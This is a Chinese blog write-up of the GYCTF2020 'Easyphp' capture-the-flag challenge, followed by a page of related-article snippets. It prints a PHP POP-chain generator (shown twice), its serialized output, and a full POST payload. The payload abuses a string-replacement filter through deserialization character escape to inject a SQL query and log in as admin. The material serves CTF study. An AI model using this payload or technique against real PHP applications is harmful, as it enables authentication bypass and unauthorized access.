[GYCTF2020]Easyphp

已于 2022-01-25 12:27:34 修改
阅读量1.9k 收藏
点赞数
分类专栏: writerup 文章标签: 网络安全
于 2022-01-24 10:42:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49835838/article/details/122662852
版权

知识点

  1. 反序列化pop链
  2. 反序列化字符逃逸

解题过程

www.zip 备份文件获取源码

审计代码构造pop链

<?php

Class UpdateHelper{
    public $id;
    public $newinfo;
    public $sql;
}

class User
{
    public $id;
    public $age;
    public $nickname;

    public function __toString()
    {
        $this->nickname->update($this->age);
        return "0-0";
    }
}

class dbCtrl
{
    public $hostname="127.0.0.1";
    public $dbuser="root";
    public $dbpass="root";
    public $database="test";
    public $name;
    public $password;
    public $mysqli;
    public $token;
}

class Info{
    public $age;
    public $nickname;
    public $CtrlCase;

    public function __call($name,$argument){
        echo $this->CtrlCase->login($argument[0]);
    }
}

$a = new UpdateHelper();
$b = new User();
$c = new Info();
$d = new dbCtrl();
$d->name = "admin";
$d->password = "1";
$c->CtrlCase = $d;
$b->nickname = $c;
$b->age = 'select id, "c4ca4238a0b923820dcc509a6f75849b" from user where username=?';
$a->sql = $b;
$s = serialize($a);


$obj_dream = new Info();
$obj_dream->age = "1";
$obj_dream->nickname = "11";
$obj_dream->CtrlCase = $a;
echo serialize($obj_dream);



<?php

Class UpdateHelper{
    public   $id;
    public $newinfo;
    public $sql;
}

class User
{
    public $id;
    public $age;
    public $nickname;

    public function __toString()
    {
        $this->nickname->update($this->age);
        return "0-0";
    }
}

class dbCtrl
{
    public $hostname="127.0.0.1";
    public $dbuser="root";
    public $dbpass="root";
    public $database="test";
    public $name;
    public $password;
    public $mysqli;
    public $token;
}

class Info{
    public $age;
    public $nickname;
    public $CtrlCase;

    public function __call($name,$argument){
        echo $this->CtrlCase->login($argument[0]);
    }
}

$a = new UpdateHelper();
$b = new User();
$c = new Info();
$d = new dbCtrl();
$d->name = "admin";
$d->password = "1";
$c->CtrlCase = $d;
$b->nickname = $c;
$b->age = 'select id, "c4ca4238a0b923820dcc509a6f75849b" from user where username=?';
$a->sql = $b;
$s = serialize($a);


$obj_dream = new Info();
$obj_dream->age = "1";
$obj_dream->nickname = "11";
$obj_dream->CtrlCase = $a;
echo serialize($obj_dream);


O:4:"Info":3:{s:3:"age";s:1:"1";s:8:"nickname";s:2:"11";s:8:"CtrlCase";O:12:"UpdateHelper":3:{s:2:"id";N;s:7:"newinfo";N;s:3:"sql";O:4:"User":3:{s:2:"id";N;s:3:"age";s:72:"select id, "c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":3:{s:3:"age";N;s:8:"nickname";N;s:8:"CtrlCase";O:6:"dbCtrl":8:{s:8:"hostname";s:9:"127.0.0.1";s:6:"dbuser";s:4:"root";s:6:"dbpass";s:4:"root";s:8:"database";s:4:"test";s:4:"name";s:5:"admin";s:8:"password";s:1:"1";s:6:"mysqli";N;s:5:"token";N;}}}}}

漏洞处只能传递两个参数

但是有safe这个替换函数

存在反序列化字符逃逸漏洞,可以逃逸任意数量的字符

用字符逃逸传递三个参数进去

需要逃逸的字符串为

";s:8:"CtrlCase";O:12:"UpdateHelper":3:{s:2:"id";N;s:7:"newinfo";N;s:3:"sql";O:4:"User":3:{s:2:"id";N;s:3:"age";s:72:"select id, "c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":3:{s:3:"age";N;s:8:"nickname";N;s:8:"CtrlCase";O:6:"dbCtrl":8:{s:8:"hostname";s:9:"127.0.0.1";s:6:"dbuser";s:4:"root";s:6:"dbpass";s:4:"root";s:8:"database";s:4:"test";s:4:"name";s:5:"admin";s:8:"password";s:1:"1";s:6:"mysqli";N;s:5:"token";N;}}}}}

总共466个字符

由safe函数可知 *替换成hacker多5个字符 union替换成hacker多一个字符

93个*加1个union即可逃逸466个字符

payload为

age=1&nickname=*********************************************************************************************union";s:8:"CtrlCase";O:12:"UpdateHelper":3:{s:2:"id";N;s:7:"newinfo";N;s:3:"sql";O:4:"User":3:{s:2:"id";N;s:3:"age";s:72:"select id, "c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":3:{s:3:"age";N;s:8:"nickname";N;s:8:"CtrlCase";O:6:"dbCtrl":8:{s:8:"hostname";s:9:"127.0.0.1";s:6:"dbuser";s:4:"root";s:6:"dbpass";s:4:"root";s:8:"database";s:4:"test";s:4:"name";s:5:"admin";s:8:"password";s:1:"1";s:6:"mysqli";N;s:5:"token";N;}}}}}

注入后,session[token]为admin,再以admin为账号,任意密码即可登录,拿到flag

b1ackc4t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
EasyPHP
07-22
资源名称:EasyPHP工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片: 资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
[GYCTF2020]Easyphp php反序列化字符串逃逸+sql
scrawman的博客
12-04 3771
[GYCTF2020]Easyphp www.zip找到源代码,重点应该在lib.php和update.php function safe($parm){ $array= array('union','regexp','load','into','flag','file','insert',"'",'\\',"*","alter"); return str_replace($array,'hacker',$parm); } public function update(){
深入解析[羊城杯 2020]Easyphp2
最新发布
qq_49849300的博客
03-07 373
0.遇到回显:Sorry, only people from GWHT are allowed to access this website.23333。b.打开蚁剑命令行 find / -name flag*7.直接切换用户不行,因为蚁剑shell不是完整tty。所以用 find /GWHT -name flag*a.如何将简单的Shell转换成为完全交互式的TTY。3.直接命令执行看不到flag,命令执行写马。直接读flag.txt是不行的,没有权限。先放官方wp,写的比较简易。6.手动翻找其他线索。
BUUCTF:GYCTF2020/新春战疫Easyphp
末初的CSDN博客
03-29 3099
参考:https://blog.csdn.net/qq_42181428/article/details/104474414?fps=1&locationNum=2 新春战疫原题在BUU上的复现,反序列化配合字符逃逸 源码泄露www,zip PHP反序列化的字符逃逸的原理 PHP在进行反序列化的时候,只要前面的字符串符合反序列化的规则并能成功反序列化,那么将忽略后面多余的字符串 获取f...
EasyPHP.zip
07-11
EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件
easyphp5.4.6
02-08
一款集成PHP,APACHE,MYSQL的工具,绝对可用并好用!!
easyphp12.1
09-23
实现mysql php apche的功能,与moodle搭配使用 实现学校课程平台的搭建
EasyPHP5.3.5.0setup
05-22
EasyPHP5.3.5.0setup安装软件包5.3.5.0,方便,可用。
[GYCTF2020]EasyThinking
qq_43801002的博客
05-05 1834
#题目: 简简单单,朴实无华的一个网站,/home/member/registerURL很有东西,MVC框架的站,看到题目,很容易就就想到是个TP的站,随后输入不存在的路由,发现是TP6.0 1.先用现成的POC测一下,存在一个session文件写马的漏洞,估计就是要考这个 https://www.venustech.com.cn/article/1/11027.html session可控,...
[GYCTF2020]EasyThinking (ThinkPHP V6.0.0)
qq_62046696的博客
01-25 1535
但是发现无法直接读取flag,应该是需要通过执行readflag得到flag,这个时候发现终端不能执行命令,这也正是本题的第二个考点。打开以后就注册一些功能,注册admin admin,成功然后尝试search这个方法是否有任意文件读取漏洞,试了试没有任何的回显。ThinkPHP6.0.0版本,直接百度搜漏洞,任意文件写入漏洞,然后想到能不能直接写入一句话马,然后得flag。然后想法就是直接找到这个文件,直接蚁建出就可以,但是这个session保存在了哪呢,然后个人中心,显示的是自己的历史命令。
[GYCTF2020]Blacklist 1(详细做题过程)
lunan的博客
05-24 1868
[GYCTF2020]Blacklist 1(详细做题过程) 文章目录[GYCTF2020]Blacklist 1(详细做题过程)1、考点2、解题过程1、寻找`注入点`2、尝试`堆叠注入`3、尝试`联合注入`4、尝试`双写绕过`5、尝试`大小写绕过`6、传统方法行不通,看别人的wp中提到了`Handler`3、Handler语法 1、考点 1、堆叠注入 2、 Handler语法 心得:学会新的姿势Handler的sql查询方法 2、解题过程 1、寻找注入点 http://3c6e5317-cd37-4
攻防世界 easyphp
09-11
EasyPHP中,攻防世界是一个基于CTF(Capture The Flag)赛制的在线平台,旨在提供网络安全学习和竞赛的机会。 攻防世界平台上有各种不同的题目和挑战,涵盖了网络安全的多个方面,包括但不限于Web漏洞、系统漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

b1ackc4t

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值